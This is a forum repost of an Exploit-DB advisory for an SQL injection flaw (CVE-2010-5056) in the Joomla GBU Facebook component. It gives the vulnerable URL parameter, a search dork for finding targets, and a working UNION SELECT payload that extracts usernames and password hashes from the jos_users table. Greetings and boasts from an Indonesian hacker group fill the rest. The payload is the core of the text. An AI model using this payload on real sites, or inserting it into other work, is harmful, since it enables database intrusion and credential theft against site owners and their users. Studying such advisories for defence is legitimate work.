- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 12299
- Проверка EDB
-
- Пройдено
- Автор
- KAMTIEZ
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2010-5056
- Дата публикации
- 2010-04-19
Код:
[!]===========================================================================[!]
[~] Joomla Component GBU FACEBOOK SQL injection vulnerability
[~] Author : kaMtiEz ([email protected])
[~] Homepage : http://www.indonesiancoder.com
[~] Date : 20 april, 2010
[!]===========================================================================[!]
[ Software Information ]
[+] Vendor : http://www.gbugrafici.nl/gbufacebook/
[+] Price : free
[+] Vulnerability : SQL
[+] Dork : inurl:"CIHUY" ;)
[+] Download : http://www.gbugrafici.nl/gbufacebook/com_gbufacebook.zip
[+] Version : 1.0.5 or lower maybe also affected
[!]===========================================================================[!]
[ Vulnerable File ]
http://127.0.0.1/index.php?option=com_gbufacebook&task=show_face&face_id=[INDONESIANCODER]
[ XpL ]
-999.9'+UNION+ALL+SELECT+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--+and+'kaMtiEz'='kaMtiEz
etc etc etc ;]
[!]===========================================================================[!]
[ Thx TO ]
[+] INDONESIAN CODER TEAM MainHack ServerIsDown SurabayaHackerLink IndonesianHacker MC-CREW
[+] tukulesto,M3NW5,arianom,N4CK0,Jundab,d0ntcry,bobyhikaru,gonzhack,senot
[+] Contrex,YadoY666,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31,yur4kh4
[ NOTE ]
[+] WE ARE ONE UNITY, WE ARE A CODER FAMILY, AND WE ARE INDONESIAN CODER TEAM
[+] jika kami bersama nyalakan tanda bahaya :)
[+] Ayy : Ceped sembuh bebh .. lup u :">
[+] Don Tukulesto and Acild : thanks for coming in my t0wn :D
[ QUOTE ]
[+] INDONESIANCODER still r0x
[+] nothing secure ..- Источник
- www.exploit-db.com
